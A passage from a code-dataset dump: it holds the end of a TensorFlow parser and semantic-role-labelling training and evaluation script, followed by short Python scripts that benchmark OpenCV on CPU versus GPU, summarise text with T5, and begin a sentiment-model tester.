len(started_types) > curr_len:\n converted[-1] += ')'\n started_types.pop()\n while len(started_types) < len(Itypes) + len(Btypes):\n combined_str = '(' + Itypes[-1] + combined_str\n started_types.append(Itypes[-1])\n Itypes.pop()\n if 
not combined_str:\n combined_str = '*'\n elif combined_str[0] == \"(\" and combined_str[-1] != \")\":\n combined_str += '*'\n elif combined_str[-1] == \")\" and combined_str[0] != \"(\":\n combined_str = '*' + combined_str\n converted.append(combined_str)\n while len(started_types) > 0:\n converted[-1] += ')'\n started_types.pop()\n return converted\n\n def parens_check(self, srl_preds_str):\n for srl_preds in srl_preds_str:\n parens_count = 0\n for pred in srl_preds:\n for c in pred:\n if c == '(':\n parens_count += 1\n if c == ')':\n parens_count -= 1\n if parens_count < 0:\n return False\n if parens_count != 0:\n return False\n return True\n\n def merge_preds(self, all_preds, dataset):\n # want a sentences x tokens x fields array\n preds_merged = []\n current_sentid = -1\n current_sent_shared = None\n current_srls = []\n current_predicates = None\n merged_indices = []\n examples = 0\n sentences = 0\n predicate_idx = 4\n\n # for each example\n for bkt_idx, idx in dataset._metabucket.data:\n examples += 1\n preds = all_preds[bkt_idx][idx]\n this_sent_id = preds[0, 6]\n # if this_sent_id < 4:\n # print(\"orig preds\", preds)\n # print(\"preds\", preds)\n if this_sent_id != current_sentid:\n sentences += 1\n current_sentid = this_sent_id\n # print(\"processing sent %d\" % current_sentid)\n merged_indices.append((bkt_idx, idx))\n if current_sent_shared is not None:\n # print(\"last sent had: %d/%d preds\" % (len(current_srls), np.sum(current_predicates)))\n # merge and add to merged list\n # print(merged_srls)\n # if len(merged_srls.shape) == 1:\n # merged_srls = np.expand_dims(merged_srls, -1)\n # print(\"merged srls\", len(merged_srls.shape), merged_srls.shape, merged_srls)\n # print(\"current shared\", current_sent_shared.shape, current_sent_shared)\n current_sent_shared[:, predicate_idx] = current_predicates\n if current_srls:\n merged_srls = np.concatenate(current_srls, axis=-1)\n merged_sent = np.concatenate([current_sent_shared, merged_srls], axis=1)\n else:\n merged_sent = current_sent_shared\n preds_merged.append(merged_sent)\n current_sent_shared = preds[:, :17]\n current_srls = []\n current_predicates = np.zeros(current_sent_shared.shape[0])\n if preds.shape[1] > 16:\n # print(current_sent_shared)\n current_srls.append(np.expand_dims(preds[:, -1], -1))\n current_predicates += (preds[:, predicate_idx] > self._vocabs[4].predicate_true_start_idx).astype(np.int32)\n # print(\"predicates\", (preds[:, predicate_idx] > self._vocabs[4].predicate_true_start_idx).astype(np.int32))\n\n # deal with last one\n current_sent_shared[:, predicate_idx] = current_predicates\n if current_srls:\n merged_srls = np.concatenate(current_srls, axis=-1)\n merged_sent = np.concatenate([current_sent_shared, merged_srls], axis=1)\n else:\n merged_sent = current_sent_shared\n preds_merged.append(merged_sent)\n\n print(\"Merged %d examples into %d/%d sentences\" % (examples, len(preds_merged), sentences))\n return preds_merged, merged_indices\n\n \n #=============================================================\n # TODO make this work if lines_per_buff isn't set to 0\n def test(self, sess, viterbi=False, validate=False):\n \"\"\"\"\"\"\n \n if validate:\n filename = self.valid_file\n minibatches = self.valid_minibatches\n dataset = self._validset\n op = self.ops['test_op'][:15]\n else:\n filename = self.test_file\n minibatches = self.test_minibatches\n dataset = self._testset\n op = self.ops['test_op'][15:]\n \n all_predictions = [[]]\n all_sents = [[]]\n bkt_idx = 0\n total_time = 0.\n roots_lt_total = 0.\n 
roots_gt_total = 0.\n cycles_2_total = 0.\n cycles_n_total = 0.\n not_tree_total = 0.\n srl_correct_total = 0.\n srl_count_total = 0.\n forward_total_time = 0.\n non_tree_preds_total = []\n attention_weights = {}\n attn_correct_counts = {}\n pos_correct_total = 0.\n n_tokens = 0.\n for batch_num, (feed_dict, sents) in enumerate(minibatches()):\n mb_inputs = feed_dict[dataset.inputs]\n mb_targets = feed_dict[dataset.targets]\n forward_start = time.time()\n probs, n_cycles, len_2_cycles, srl_probs, srl_preds, srl_logits, srl_correct, srl_count, srl_predicates, srl_predicate_targets, transition_params, attn_weights, attn_correct, pos_correct, pos_preds = sess.run(op, feed_dict=feed_dict)\n forward_total_time += time.time() - forward_start\n preds, parse_time, roots_lt, roots_gt, cycles_2, cycles_n, non_trees, non_tree_preds, n_tokens_batch = self.model.validate(mb_inputs, mb_targets, probs, n_cycles, len_2_cycles, srl_preds, srl_logits, srl_predicates, srl_predicate_targets, pos_preds, transition_params if viterbi else None)\n n_tokens += n_tokens_batch\n for k, v in attn_weights.iteritems():\n attention_weights[\"b%d:layer%d\" % (batch_num, k)] = v\n for k, v in attn_correct.iteritems():\n if k not in attn_correct_counts:\n attn_correct_counts[k] = 0.\n attn_correct_counts[k] += v\n total_time += parse_time\n roots_lt_total += roots_lt\n roots_gt_total += roots_gt\n cycles_2_total += cycles_2\n cycles_n_total += cycles_n\n not_tree_total += non_trees\n srl_correct_total += srl_correct\n srl_count_total += srl_count\n pos_correct_total += pos_correct\n non_tree_preds_total.extend(non_tree_preds)\n all_predictions[-1].extend(preds)\n all_sents[-1].extend(sents)\n if len(all_predictions[-1]) == len(dataset[bkt_idx]):\n bkt_idx += 1\n if bkt_idx < len(dataset._metabucket):\n all_predictions.append([])\n all_sents.append([])\n\n if self.one_example_per_predicate:\n all_predictions, data_indices = self.merge_preds(all_predictions, dataset)\n else:\n data_indices = dataset._metabucket.data\n # all_predictions = [p for s in all_predictions for p in s]\n\n correct = {'UAS': 0., 'LAS': 0., 'parse_eval': '', 'F1': 0.}\n srl_acc = 0.0\n if self.eval_parse:\n print(\"Total time in prob_argmax: %f\" % total_time)\n print(\"Total time in forward: %f\" % forward_total_time)\n print(\"Not tree: %d\" % not_tree_total)\n print(\"Roots < 1: %d; Roots > 1: %d; 2-cycles: %d; n-cycles: %d\" % (roots_lt_total, roots_gt_total, cycles_2_total, cycles_n_total))\n # ID: Word index, integer starting at 1 for each new sentence; may be a range for multiword tokens; may be a decimal number for empty nodes.\n # FORM: Word form or punctuation symbol.\n # LEMMA: Lemma or stem of word form.\n # UPOSTAG: Universal part-of-speech tag.\n # XPOSTAG: Language-specific part-of-speech tag; underscore if not available.\n # FEATS: List of morphological features from the universal feature inventory or from a defined language-specific extension; underscore if not available.\n # HEAD: Head of the current word, which is either a value of ID or zero (0).\n # DEPREL: Universal dependency relation to the HEAD (root iff HEAD = 0) or a defined language-specific subtype of one.\n # DEPS: Enhanced dependency graph in the form of a list of head-deprel pairs.\n # MISC: Any other annotation.\n\n parse_gold_fname = self.gold_dev_parse_file if validate else self.gold_test_parse_file\n\n # write predicted parse\n parse_pred_fname = os.path.join(self.save_dir, \"parse_preds.tsv\")\n with open(parse_pred_fname, 'w') as f:\n for p_idx, (bkt_idx, idx) in 
enumerate(data_indices):\n preds = all_predictions[p_idx] if self.one_example_per_predicate else all_predictions[bkt_idx][idx]\n words = all_sents[bkt_idx][idx]\n # sent[:, 6] = targets[tokens, 0] # 5 targets[0] = gold_tag\n # sent[:, 7] = parse_preds[tokens] # 6 = pred parse head\n # sent[:, 8] = rel_preds[tokens] # 7 = pred parse label\n # sent[:, 9] = targets[tokens, 1] # 8 = gold parse head\n # sent[:, 10] = targets[tokens, 2] # 9 = gold parse label\n sent_len = len(words)\n if self.eval_single_token_sents or sent_len > 1:\n for i, (word, pred) in enumerate(zip(words, preds)):\n head = pred[8] + 1\n tok_id = i + 1\n # assert self.tags[datum[6]] == self.tags[pred[7]]\n tup = (\n tok_id, # id\n word, # form\n self.tags[pred[7]], # gold tag\n # self.tags[pred[11]] if self.joint_pos_predicates or self.train_pos else self.tags[pred[4]], # pred tag or auto tag\n str(head if head != tok_id else 0), # pred head\n self.rels[pred[9]] # pred label\n )\n f.write('%s\\t%s\\t_\\t%s\\t_\\t_\\t%s\\t%s\\n' % tup)\n f.write('\\n')\n\n with open(os.devnull, 'w') as devnull:\n try:\n parse_eval = check_output([\"perl\", \"bin/eval.pl\", \"-g\", parse_gold_fname, \"-s\", parse_pred_fname], stderr=devnull)\n short_str = parse_eval.split('\\n')[:3]\n print('\\n'.join(short_str))\n print('\\n')\n correct['parse_eval'] = parse_eval\n correct['LAS'] = short_str[0].split()[9]\n correct['UAS'] = short_str[1].split()[9]\n except CalledProcessError as e:\n print(\"Call to parse eval failed: %s\" % e.output)\n\n if self.eval_by_domain:\n parse_gold_fname_path = '/'.join(parse_gold_fname.split('/')[:-1])\n parse_gold_fname_end = parse_gold_fname.split('/')[-1]\n for d in self._vocabs[5].keys():\n if d not in self._vocabs[5].SPECIAL_TOKENS:\n domain_gold_fname = os.path.join(parse_gold_fname_path, d + '_' + parse_gold_fname_end)\n domain_fname = os.path.join(self.save_dir, '%s_parse_preds.tsv' % d)\n with open(domain_fname, 'w') as f:\n for p_idx, (bkt_idx, idx) in enumerate(data_indices):\n preds = all_predictions[p_idx] if self.one_example_per_predicate else all_predictions[bkt_idx][idx]\n words = all_sents[bkt_idx][idx]\n domain = '-'\n sent_len = len(words)\n if self.eval_single_token_sents or sent_len > 1:\n for i, (word, pred) in enumerate(zip(words, preds)):\n domain = self._vocabs[5][pred[5]]\n head = pred[8] + 1\n tok_id = i + 1\n if domain == d:\n tup = (\n tok_id, # id\n word, # form\n self.tags[pred[7]], # gold tag\n # self.tags[pred[11]] if self.joint_pos_predicates or self.train_pos else self.tags[pred[4]], # pred tag or auto tag\n str(head if head != tok_id else 0), # pred head\n self.rels[pred[9]] # pred label\n )\n f.write('%s\\t%s\\t_\\t%s\\t_\\t_\\t%s\\t%s\\n' % tup)\n if domain == d:\n f.write('\\n')\n with open(os.devnull, 'w') as devnull:\n try:\n parse_eval_d = check_output([\"perl\", \"bin/eval.pl\", \"-g\", domain_gold_fname, \"-s\", domain_fname],\n stderr=devnull)\n short_str_d = map(lambda s: \"%s %s\" % (d, s), parse_eval_d.split('\\n')[:3])\n print('\\n'.join(short_str_d))\n print('\\n')\n # correct['parse_eval'] = parse_eval\n # correct['LAS'] = short_str[0].split()[9]\n # correct['UAS'] = short_str[1].split()[9]\n except CalledProcessError as e:\n print(\"Call to eval failed: %s\" % e.output)\n\n if self.eval_srl:\n # load the real gold preds file\n srl_gold_fname = self.gold_dev_props_file if validate else self.gold_test_props_file\n\n # save SRL gold output for debugging purposes\n srl_sanity_fname = os.path.join(self.save_dir, 'srl_sanity.tsv')\n with open(srl_sanity_fname, 'w') as 
f, open(filename, 'r') as orig_f:\n for p_idx, (bkt_idx, idx) in enumerate(data_indices):\n # for each word, if predicate print word, otherwise -\n # then all the SRL labels\n data = dataset._metabucket[bkt_idx].data[idx]\n preds = all_predictions[p_idx] if self.one_example_per_predicate else all_predictions[bkt_idx][idx]\n # if len(preds.shape) < 2:\n # preds = np.reshape(preds, [1, preds.shape[0]])\n words = all_sents[bkt_idx][idx]\n num_gold_srls = preds[0, 13]\n num_pred_srls = preds[0, 14]\n srl_preds = preds[:, 15+num_pred_srls+num_gold_srls:]\n srl_golds = preds[:, 15+num_pred_srls:15+num_gold_srls+num_pred_srls]\n srl_preds_bio = map(lambda p: self._vocabs[3][p], srl_preds)\n srl_preds_str = map(list, zip(*[self.convert_bilou(j) for j in np.transpose(srl_preds)]))\n # todo if you want golds in here get it from the props file\n # srl_golds_str = map(list, zip(*[self.convert_bilou(j) for j in np.transpose(srl_golds)]))\n # print(srl_golds_str)\n # print(srl_preds_str)\n for i, (datum, word, pred) in enumerate(zip(data, words, preds)):\n orig_line = orig_f.readline().strip()\n while not orig_line:\n orig_line = orig_f.readline().strip()\n orig_split_line = orig_line.split('\\t')\n docid = orig_split_line[0]\n sentid = orig_split_line[1]\n domain = self._vocabs[5][pred[5]]\n orig_pred = srl_preds_str[i] if srl_preds_str else []\n # gold_pred = srl_golds_str[i] if srl_golds_str else []\n bio_pred = srl_preds_bio[i] if srl_preds_bio else []\n word_str = word\n tag0_str = self.tags[pred[7]] # gold tag\n tag1_str = self.tags[pred[3]] # auto tag\n tag2_str = self.tags[pred[12]] # predicted tag\n # gold_pred = word if np.any([\"(V*\" in p for p in gold_pred]) else '-'\n pred_pred = word if np.any([\"(V*\" in p for p in orig_pred]) else '-'\n # fields = (domain,) + (word_str,) + (tag0_str,) + (tag1_str,) + (tag2_str,) + (gold_pred,) + (pred_pred,) + tuple(bio_pred) + tuple(orig_pred)\n fields = (docid,) + (sentid,) + (word_str,) + (tag0_str,) + (tag1_str,) + (tag2_str,) + (pred_pred,) + tuple(bio_pred) + tuple(orig_pred)\n owpl_str = '\\t'.join(fields)\n f.write(owpl_str + \"\\n\")\n f.write('\\n')\n\n # save SRL output\n srl_preds_fname = os.path.join(self.save_dir, 'srl_preds.tsv')\n # print(\"writing srl preds file: %s\" % srl_preds_fname)\n with open(srl_preds_fname, 'w') as f:\n for p_idx, (bkt_idx, idx) in enumerate(data_indices):\n # for each word, if predicate print word, otherwise -\n # then all the SRL labels\n preds = all_predictions[p_idx] if self.one_example_per_predicate else all_predictions[bkt_idx][idx]\n words = all_sents[bkt_idx][idx]\n # if len(preds.shape) < 2:\n # preds = np.reshape(preds, [1, preds.shape[0]])\n # print(\"preds\", preds)\n num_gold_srls = preds[0, 13]\n num_pred_srls = preds[0, 14]\n srl_preds = preds[:, 15 + num_gold_srls + num_pred_srls:]\n if self.one_example_per_predicate:\n # srl_preds = preds[:, 14 + num_gold_srls + num_pred_srls:]\n predicate_indices = np.where(preds[:, 4] == 1)[0]\n # print(\"predicate indices\", predicate_indices)\n else:\n predicate_indices = preds[0, 15:15+num_pred_srls]\n # print(\"predicate indices\", predicate_indices)\n srl_preds_str = map(list, zip(*[self.convert_bilou(j) for j in np.transpose(srl_preds)]))\n # if len(predicate_indices) == 0:\n # if preds[0,6] < 4:\n # print(\"preds\", preds)\n # print(\"predicate inds\", predicate_indices)\n # print(\"srl_preds_str\", srl_preds_str)\n # print(\"srl_preds\", srl_preds)\n # print(\"words\", words)\n for i, word in enumerate(words):\n pred = srl_preds_str[i] if srl_preds_str 
else []\n word_str = word if i in predicate_indices else '-'\n fields = (word_str,) + tuple(pred)\n owpl_str = '\\t'.join(fields)\n f.write(owpl_str + \"\\n\")\n if not self.parens_check(np.transpose(srl_preds_str)):\n print(np.transpose(srl_preds_str))\n print(map(lambda i: self._vocabs[3][i], np.transpose(srl_preds)))\n f.write('\\n')\n\n srl_acc = (srl_correct_total / srl_count_total)*100.0\n\n with open(os.devnull, 'w') as devnull:\n try:\n srl_eval = check_output([\"perl\", \"bin/srl-eval.pl\", srl_gold_fname, srl_preds_fname], stderr=devnull)\n print(srl_eval)\n overall_f1 = float(srl_eval.split('\\n')[6].split()[-1])\n correct['F1'] = overall_f1\n except CalledProcessError as e:\n print(\"Call to eval failed: %s\" % e.output)\n\n if self.eval_by_domain:\n srl_gold_fname_path = '/'.join(srl_gold_fname.split('/')[:-1])\n srl_gold_fname_end = srl_gold_fname.split('/')[-1]\n for d in self._vocabs[5].keys():\n if d not in self._vocabs[5].SPECIAL_TOKENS:\n domain_gold_fname = os.path.join(srl_gold_fname_path, d + '_' + srl_gold_fname_end)\n domain_fname = os.path.join(self.save_dir, '%s_srl_preds.tsv' % d)\n with open(domain_fname, 'w') as f:\n for p_idx, (bkt_idx, idx) in enumerate(data_indices):\n # for each word, if predicate print word, otherwise -\n # then all the SRL labels\n # data = dataset._metabucket[bkt_idx].data[idx]\n preds = all_predictions[p_idx] if self.one_example_per_predicate else all_predictions[bkt_idx][idx]\n words = all_sents[bkt_idx][idx]\n num_gold_srls = preds[0, 13]\n num_pred_srls = preds[0, 14]\n srl_preds = preds[:, 15 + num_gold_srls + num_pred_srls:]\n predicate_indices = preds[:, 15:15 + num_pred_srls]\n srl_preds_str = map(list, zip(*[self.convert_bilou(j) for j in np.transpose(srl_preds)]))\n domain = '-'\n for i, (word, p) in enumerate(zip(words, preds)):\n domain = self._vocabs[5][p[5]]\n if domain == d:\n pred = srl_preds_str[i] if srl_preds_str else []\n word_str = word if i in predicate_indices else '-'\n fields = (word_str,) + tuple(pred)\n owpl_str = '\\t'.join(fields)\n f.write(owpl_str + \"\\n\")\n if not self.parens_check(np.transpose(srl_preds_str)):\n print(np.transpose(srl_preds_str))\n print(map(lambda i: self._vocabs[3][i], np.transpose(srl_preds)))\n if domain == d:\n f.write('\\n')\n with open(os.devnull, 'w') as devnull:\n try:\n srl_eval_d = check_output([\"perl\", \"bin/srl-eval.pl\", domain_gold_fname, domain_fname], stderr=devnull)\n # print(srl_eval)\n str_d = srl_eval_d.split('\\n')[6]\n except CalledProcessError as e:\n print(\"Call to eval failed: %s\" % e.output)\n str_d = \"\"\n print(\"%sSRL %s:\" % (\"viterbi \" if viterbi else \"\", d))\n print(str_d)\n\n # with open(os.path.join(self.save_dir, 'scores.txt'), 'a') as f:\n # s, correct = self.model.evaluate(os.path.join(self.save_dir, os.path.basename(filename)), punct=self.model.PUNCT)\n # f.write(s)\n\n if validate and self.multitask_layers != \"\":\n print(\"Attention UAS: \")\n multitask_uas_str = ''\n for k in sorted(attn_correct_counts):\n # todo w/ w/o mask punct\n attn_correct_counts[k] = attn_correct_counts[k] / n_tokens\n multitask_uas_str += '\\t%s UAS: %.2f' % (k, attn_correct_counts[k] * 100)\n print(multitask_uas_str)\n\n if self.save_attn_weights:\n attention_weights = {str(k): v for k, v in attention_weights.iteritems()}\n np.savez(os.path.join(self.save_dir, 'attention_weights'), **attention_weights)\n\n pos_accuracy = (pos_correct_total/n_tokens)*100.0\n correct['POS'] = pos_accuracy\n # if validate:\n # np.savez(os.path.join(self.save_dir, 
'non_tree_preds.txt'), non_tree_preds_total)\n # print(non_tree_preds_total)\n # print(non_tree_preds_total, file=f)\n # las = np.mean(correct[\"LAS\"]) * 100\n # uas = np.mean(correct[\"UAS\"]) * 100\n print('UAS: %s LAS: %s' % (correct[\"UAS\"], correct[\"LAS\"]))\n print('POS: %.2f' % pos_accuracy)\n print('SRL acc: %.2f' % (srl_acc))\n print('%sSRL F1: %s' % (\"viterbi \" if viterbi else \"\", correct[\"F1\"]))\n return correct\n \n #=============================================================\n def savefigs(self, sess, optimizer=False):\n \"\"\"\"\"\"\n \n import gc\n import matplotlib as mpl\n mpl.use('Agg')\n import matplotlib.pyplot as plt\n matdir = os.path.join(self.save_dir, 'matrices')\n if not os.path.isdir(matdir):\n os.mkdir(matdir)\n for var in self.save_vars:\n if optimizer or ('Optimizer' not in var.name):\n print(var.name)\n mat = sess.run(var)\n if len(mat.shape) == 1:\n mat = mat[None,:]\n plt.figure()\n try:\n plt.pcolor(mat, cmap='RdBu')\n plt.gca().invert_yaxis()\n plt.colorbar()\n plt.clim(vmin=-1, vmax=1)\n plt.title(var.name)\n plt.savefig(os.path.join(matdir, var.name.replace('/', '-')))\n except ValueError:\n pass\n plt.close()\n del mat\n gc.collect()\n \n #=============================================================\n def _gen_ops(self):\n \"\"\"\"\"\"\n \n optimizer = optimizers.RadamOptimizer(self._config, global_step=self._global_step)\n train_output = self._model(self._trainset)\n\n lr = optimizer.learning_rate\n\n train_op = optimizer.minimize(train_output['loss'])\n\n # These have to happen after optimizer.minimize is called\n valid_output = self._model(self._validset, moving_params=optimizer)\n test_output = self._model(self._testset, moving_params=optimizer)\n\n\n \n ops = {}\n ops['train_op'] = [train_op] + [train_output['loss'],\n train_output['n_correct'],\n train_output['n_tokens']]\n ops['train_op_svd'] = [train_op] + [train_output['loss'],\n train_output['n_correct'],\n train_output['n_tokens'],\n train_output['roots_loss'],\n train_output['2cycle_loss'],\n train_output['svd_loss'],\n train_output['log_loss'],\n train_output['rel_loss']]\n ops['train_op_srl'] = [train_op] + [train_output['loss'],\n train_output['n_correct'],\n train_output['n_tokens'],\n train_output['roots_loss'],\n train_output['2cycle_loss'],\n train_output['svd_loss'],\n train_output['log_loss'],\n train_output['rel_loss'],\n train_output['srl_loss'],\n train_output['srl_correct'],\n train_output['srl_count'],\n train_output['predicate_loss'],\n train_output['predicate_count'],\n train_output['predicate_correct'],\n train_output['pos_loss'],\n train_output['pos_correct'],\n train_output['multitask_losses'],\n lr,\n train_output['sample_prob']]\n ops['valid_op'] = [valid_output['loss'],\n valid_output['n_correct'],\n valid_output['n_tokens'],\n valid_output['predictions']]\n ops['test_op'] = [valid_output['probabilities'],\n valid_output['n_cycles'],\n valid_output['len_2_cycles'],\n valid_output['srl_probs'],\n valid_output['srl_preds'],\n valid_output['srl_logits'],\n valid_output['srl_correct'],\n valid_output['srl_count'],\n valid_output['srl_predicates'],\n valid_output['srl_predicate_targets'],\n valid_output['transition_params'],\n valid_output['attn_weights'],\n valid_output['attn_correct'],\n valid_output['pos_correct'],\n valid_output['pos_preds'],\n test_output['probabilities'],\n test_output['n_cycles'],\n test_output['len_2_cycles'],\n test_output['srl_probs'],\n test_output['srl_preds'],\n test_output['srl_logits'],\n test_output['srl_correct'],\n 
test_output['srl_count'],\n test_output['srl_predicates'],\n test_output['srl_predicate_targets'],\n test_output['transition_params'],\n test_output['attn_weights'],\n test_output['attn_correct'],\n test_output['pos_correct'],\n test_output['pos_preds'],\n ]\n # ops['optimizer'] = optimizer\n \n return ops\n \n #=============================================================\n # @property\n # def global_step(self):\n # return self._global_step\n @property\n def global_epoch(self):\n return self._global_epoch\n @property\n def model(self):\n return self._model\n @property\n def words(self):\n return self._vocabs[0]\n @property\n def tags(self):\n return self._vocabs[1]\n @property\n def rels(self):\n return self._vocabs[2]\n @property\n def ops(self):\n return self._ops\n @property\n def save_vars(self):\n return self._save_vars\n \n#***************************************************************\nif __name__ == '__main__':\n \"\"\"\"\"\"\n \n import argparse\n \n argparser = argparse.ArgumentParser()\n argparser.add_argument('--test', action='store_true')\n argparser.add_argument('--load', action='store_true')\n argparser.add_argument('--model', default='Parser')\n argparser.add_argument('--matrix', action='store_true')\n argparser.add_argument('--profile', action='store_true')\n argparser.add_argument('--test_eval', action='store_true')\n \n args, extra_args = argparser.parse_known_args()\n cargs = {k: v for (k, v) in vars(Configurable.argparser.parse_args(extra_args)).iteritems() if v is not None}\n \n print('*** '+args.model+' ***')\n model = getattr(models, args.model)\n\n profile = args.profile\n \n # if 'save_dir' in cargs and os.path.isdir(cargs['save_dir']) and not (args.test or args.matrix or args.load):\n # raw_input('Save directory already exists. 
Press to overwrite or to exit.')\n # if (args.test or args.load or args.matrix) and 'save_dir' in cargs:\n # cargs['config_file'] = os.path.join(cargs['save_dir'], 'config.cfg')\n network = Network(model, **cargs)\n os.system('echo Model: %s > %s/MODEL' % (network.model.__class__.__name__, network.save_dir))\n\n # print variable names (but not the optimizer ones)\n print([v.name for v in network.save_vars if 'Optimizer' not in v.name and 'layer_norm' not in v.name])\n\n config_proto = tf.ConfigProto()\n config_proto.gpu_options.per_process_gpu_memory_fraction = network.per_process_gpu_memory_fraction\n\n # Create options to profile the time and memory information.\n if profile:\n builder = tf.profiler.ProfileOptionBuilder\n opts = builder(builder.time_and_memory()).order_by('micros').build()\n # Create a profiling context, set constructor argument `trace_steps`,\n # `dump_steps` to empty for explicit control.\n with tf.contrib.tfprof.ProfileContext('/tmp/train_dir',\n trace_steps=[],\n dump_steps=[]) if profile else dummy_context_mgr() as pctx:\n with tf.Session(config=config_proto) as sess:\n sess.run(tf.global_variables_initializer())\n if not (args.test or args.matrix):\n if args.load:\n os.system('echo Training: > %s/HEAD' % network.save_dir)\n os.system('git rev-parse HEAD >> %s/HEAD' % network.save_dir)\n saver = tf.train.Saver(var_list=network.save_vars, save_relative_paths=True)\n saver.restore(sess, tf.train.latest_checkpoint(network.load_dir, latest_filename=network.name.lower()))\n if os.path.isfile(os.path.join(network.save_dir, 'history.pkl')):\n with open(os.path.join(network.save_dir, 'history.pkl')) as f:\n network.history = pkl.load(f)\n else:\n os.system('echo Loading: >> %s/HEAD' % network.load_dir)\n os.system('git rev-parse HEAD >> %s/HEAD' % network.save_dir)\n network.train(sess, profile)\n elif args.matrix:\n saver = tf.train.Saver(var_list=network.save_vars, save_relative_paths=True)\n saver.restore(sess, tf.train.latest_checkpoint(network.save_dir, latest_filename=network.name.lower()))\n # TODO make this save pcolor plots of all matrices to a directory in save_dir\n #with tf.variable_scope('RNN0/BiRNN_FW/LSTMCell/Linear', reuse=True):\n # pkl.dump(sess.run(tf.get_variable('Weights')), open('mat0.pkl', 'w'))\n #with tf.variable_scope('RNN1/BiRNN_FW/LSTMCell/Linear', reuse=True):\n # pkl.dump(sess.run(tf.get_variable('Weights')), open('mat1.pkl', 'w'))\n #with tf.variable_scope('RNN2/BiRNN_FW/LSTMCell/Linear', reuse=True):\n # pkl.dump(sess.run(tf.get_variable('Weights')), open('mat2.pkl', 'w'))\n #with tf.variable_scope('MLP/Linear', reuse=True):\n # pkl.dump(sess.run(tf.get_variable('Weights')), open('mat3.pkl', 'w'))\n network.savefigs(sess)\n else:\n os.system('echo Testing: >> %s/HEAD' % network.save_dir)\n os.system('git rev-parse HEAD >> %s/HEAD' % network.save_dir)\n saver = tf.train.Saver(var_list=network.save_vars, save_relative_paths=True)\n print(\"Loading model: \", network.load_dir)\n print(network.name.lower())\n saver.restore(sess, tf.train.latest_checkpoint(network.load_dir, latest_filename=network.name.lower()))\n\n # decode with & without viterbi\n network.test(sess, False, validate=True)\n if network.eval_srl and (network.viterbi_decode or network.viterbi_train):\n network.test(sess, True, validate=True)\n\n # Actually evaluate on test data\n if args.test_eval:\n start_time = time.time()\n network.test(sess, network.viterbi_decode or network.viterbi_train, validate=False)\n print('Parsing took %f seconds' % (time.time() - 
start_time))\n","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":46864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"408524257","text":"\"\"\"\r\ncpu_gpu.py\r\nAn OpenCL-OpenCV-Python CPU vs GPU comparison\r\n\"\"\"\r\nimport cv2\r\nimport timeit\r\n\r\n# A simple image pipeline that runs on both Mat and Umat\r\ndef img_cal(img, mode):\r\n if mode=='UMat':\r\n img = cv2.UMat(img)\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n img = cv2.GaussianBlur(img, (7, 7), 1.5)\r\n img = cv2.Canny(img, 0, 50)\r\n if type(img) == 'cv2.UMat': \r\n img = cv2.UMat.get(img)\r\n\r\n return img\r\n\r\n# Timing function\r\ndef run(processor, function, n_threads, N):\r\n cv2.setNumThreads(n_threads)\r\n t = timeit.timeit(function, globals=globals(), number=N)/N*1000\r\n print('%s avg. with %d threads: %0.2f ms' % (processor, n, t))\r\n return t\r\n\r\nimg = cv2.imread('test.jpg') \r\nN = 1000\r\nthreads = [1, 16]\r\n\r\nprocessor = {'GPU': \"img_cal(img, 'UMat')\", \r\n 'CPU': \"img_cal(img, '')\"}\r\nresults = {}\r\nfor n in range(8): \r\n for pro in processor.keys():\r\n results[pro,n] = run(processor=pro, \r\n function= processor[pro], \r\n n_threads=n, N=N)\r\n\r\nprint('\\nGPU speed increase over 1 CPU thread [%%]: %0.2f' % \\\r\n (results[('CPU', 1)]/results[('GPU', 1)]*100))\r\nprint('CPU speed increase on 4 threads versus 1 thread [%%]: %0.2f' % \\\r\n (results[('CPU', 1)]/results[('CPU', 16)]*100))\r\nprint('GPU speed increase versus 4 threads [%%]: %0.2f' % \\\r\n (results[('CPU', 4)]/results[('CPU', 1)]*100))","sub_path":"opencv_cuda_test.py","file_name":"opencv_cuda_test.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"315872546","text":"import sys\nimport torch\nfrom transformers import T5ForConditionalGeneration,T5Tokenizer\n\nsummary_model = T5ForConditionalGeneration.from_pretrained('t5-base')\nsummary_tokenizer = T5Tokenizer.from_pretrained('t5-base')\n\ncontent = sys.argv[1]\n\ndef get_summary(text):\n preprocess_text = text.strip().replace(\"\\n\", \"\")\n\n tokenized_text = summary_tokenizer.encode(preprocess_text, add_special_tokens=False, return_tensors=\"pt\")\n\n while len(tokenized_text[0]) > 509:\n tokenized_chunk, tokenized_text = tokenized_text[0][:509], tokenized_text[0][509:]\n\n tokenized_chunk = torch.stack(\n [torch.cat([torch.Tensor([21603]), torch.Tensor([10]), tokenized_chunk, torch.Tensor([1])\n ]).long()])\n\n summary_id = summary_model.generate(tokenized_chunk,\n num_beams=5,\n no_repeat_ngram_size=2,\n min_length=100,\n max_length=512)\n\n tokenized_text = torch.stack([torch.cat([summary_id[0], tokenized_text])])\n\n output = summary_tokenizer.decode(tokenized_text[0], skip_special_tokens=True)\n\n return output\n\n\nsummary = get_summary(content)\n\nprint(summary)","sub_path":"pysummary.py","file_name":"pysummary.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"622054581","text":"import tensorflow as tf\nfrom src.base.base_test import BaseTest\nfrom tqdm import tqdm\nimport numpy as np\n\n\nclass SentimentTester(BaseTest):\n def __init__(self, sess, model, data, config, logger):\n super().__init__(sess, model, data, config, logger)\n\n def test(self):\n loop = tqdm(range(self.data.num_batches_test))\n losses = []\n accs = []\n for _ in loop:\n loss, acc = self.test_step()\n 
